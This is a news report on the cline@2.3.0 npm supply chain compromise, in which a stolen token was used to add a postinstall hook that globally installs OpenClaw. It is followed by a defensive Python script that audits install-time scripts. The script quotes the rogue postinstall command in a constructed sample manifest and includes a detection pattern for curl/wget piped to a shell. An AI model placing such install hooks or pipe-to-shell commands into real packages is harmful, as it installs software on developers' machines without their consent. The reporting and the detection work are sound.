Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems
"On February 17, 2026, at 3:26 AM PT, an unauthorized party used a compromised npm publish token to publish an update to Cline CLI on the NPM registry: cline@2.3.0," the maintainers of the Cline package said in an advisory. "The published package contains a modified package.json with an added postinstall script: '"postinstall": "npm install -g openclaw@latest"'. As a result, this causes OpenClaw to be installed on the developer's machine when Cline version 2.3.0 is installed."
"To mitigate the unauthorized publication, Cline maintainers have released version 2.4.0. Version 2.3.0 has since been deprecated and the compromised token has been revoked. Cline also said the npm publishing mechanism has been updated to support OpenID Connect (OIDC) via GitHub Actions. In a post on X, the Microsoft Threat Intelligence team said it observed a "small but noticeable uptick" in OpenClaw installations on February 17, 2026, as a result of the supply chain compromise of the Cline CLI package. According to StepSecurity, the compromised Cline package was downloaded roughly 4,000 times during the eight-hour stretch."
An unauthorized npm publish token was used to publish cline@2.3.0 with a modified package.json that added a postinstall script to run "npm install -g openclaw@latest." The added postinstall caused OpenClaw to be installed on developer machines when Cline 2.3.0 was installed. No additional modifications or overt malicious behavior were observed, but the OpenClaw installation was not authorized or intended. The compromise affected installs during an approximately eight-hour window on February 17, 2026, and did not impact the Cline VS Code extension or JetBrains plugin. Cline released 2.4.0, deprecated 2.3.0, revoked the compromised token, and updated npm publishing to support OIDC. Microsoft Threat Intelligence observed an uptick in OpenClaw installs, and StepSecurity reported roughly 4,000 downloads during the window.
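As an added defensive example (not code from Cline, npm or The Hacker News), the script below audits installed package.json files for install-time lifecycle scripts that run a global npm install, the pattern the tampered cline@2.3.0 manifest used; the package.json samples inside are constructed, and the pipe-to-shell pattern goes beyond what the article describes.

```python
"""Audit npm install-time lifecycle scripts for the kind of modification
seen in cline@2.3.0. Added example, not Cline's code; the manifests below
are constructed samples, not the real package files."""
import json
import re
from pathlib import Path

# npm runs these scripts automatically during `npm install` unless
# --ignore-scripts is set, so they are the place a tampered manifest hides.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns a reviewer would want flagged: global installs (the cline@2.3.0
# payload) and pipe-to-shell downloads (a generalization beyond the article).
SUSPICIOUS = [
    ("global-install", re.compile(r"\bnpm\s+(install|i|add)\b[^&|;]*\s(-g|--global)\b")),
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")),
]

def audit_manifest(manifest: dict) -> list[dict]:
    """Return one finding per install-time script that matches a pattern."""
    findings = []
    scripts = manifest.get("scripts", {})
    label_pkg = f"{manifest.get('name', '<unknown>')}@{manifest.get('version', '<unknown>')}"
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for reason, pattern in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append({"package": label_pkg, "hook": hook,
                                 "reason": reason, "script": cmd})
    return findings

def audit_tree(root: Path) -> list[dict]:
    """Walk an installed node_modules tree and audit every package.json in it."""
    findings = []
    for manifest_path in root.rglob("package.json"):
        try:
            findings.extend(audit_manifest(json.loads(manifest_path.read_text())))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the scan
    return findings

# Constructed sample mirroring the modification described in the advisory.
TAMPERED = {"name": "cline", "version": "2.3.0",
            "scripts": {"build": "tsc", "postinstall": "npm install -g openclaw@latest"}}
# Constructed sample of an ordinary package with a harmless lifecycle script.
BENIGN = {"name": "example-lib", "version": "1.0.0",
          "scripts": {"postinstall": "node scripts/print-notice.js"}}

if __name__ == "__main__":
    for finding in audit_manifest(TAMPERED) + audit_manifest(BENIGN):
        print(finding)
```

Installing with `npm ci --ignore-scripts`, running the audit, and only then allowing scripts is the cheaper ordering; reviewing after a postinstall has already run only tells you what happened.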
Read at The Hacker News